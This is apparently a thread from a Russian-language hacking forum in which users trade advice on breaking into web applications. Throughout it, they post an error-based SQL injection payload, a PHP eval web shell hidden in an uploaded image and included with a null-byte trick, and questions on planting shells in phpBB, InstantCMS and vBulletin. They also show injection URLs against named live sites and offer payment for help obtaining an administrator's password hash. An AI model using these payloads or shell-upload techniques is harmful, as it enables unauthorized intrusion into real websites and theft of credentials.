постом отправляй s_user_nick='and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- Как и что тут менять - кури маны.
вы оказались правы. Код не сохранился, но потом перезалил картинку в другое место на форуме(проверил-код сохранился, все хорошо), но теперь пишу точно так же Code: vbseourl=users/38290-albums1533-1313.png и с нулл байтом пробывал Code: vbseourl=users/38290-albums1533-1313.png%00.php в итоге отображается пустая страничка. Что делать?
Как образом проверили? Может все таки не сохранился? И если там мини шелл вида Code: <? eval($_REQUEST['e']);?> , то может стоит все таки передавать еще доп. параметры в инклуд?
там полноценный шелл. Проверил так: залил картинку, сохранил у себя, открыл блокнотом(код был полностью целым)
Начнем с того, что частенько такие функции как eval, system etc отключаются в PHP. Ищем phpinfo() - выясняем. Или еще проще - вместо eval в картинке заливаем сам phpinfo() и смотрим
я обещаю что буду искать, прежде чем задавать вопросы Самое интересное что эту статью читал!!! К моему примеру я ответа не нашел, так как запросы выполняются через information_schema а там разрешается ТОЛЬКО чтение. Мне же интересно можно ли как-то провести запрос на изменение данных... Konqi: тогда читайте учебник по php+mysql, все станет ясно, данный вопрос задавали многократно
Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...
Существует ли способ залить шелл через InstantCMS v1.9.1 ? и какие есть еще способы залить шелл через phpbb 3.0.10. редактировать стили не получается Code: Incorrect string value: '\xC1\xF0\xFF\xED\xF1\xEA...' for column 'template_data' at row 1 [1366]... через восстановление бд тоже не катит (((
Joomla 1.5 index.php?option=com_weblinks&view=category&id=29&filter_order=%00' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344 Community Links Warning: Invalid argument supplied for foreach() in /home/site_webmaster/www.site.com/components/com_weblinks/views/category/tmpl/default_items.php on line 38 $20 za pomosh v polycheniyy hasha admina esli vozmojno
tam sql inj ne v "id" a v "filter_order=" http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.5_21%5D_sql_injection
Есть форум на vbulletin 3.8.4, есть эксплоит: Шо за "path" и как здесь залить шел? ПРописать полный путь до шела на моем хосте? Вот так: А дальше, как в php его запустить?
http://www.mindsoul.ru/index.php?id=-628)+union+select+version()+--+ ток обрезает, надо через базед крутить..
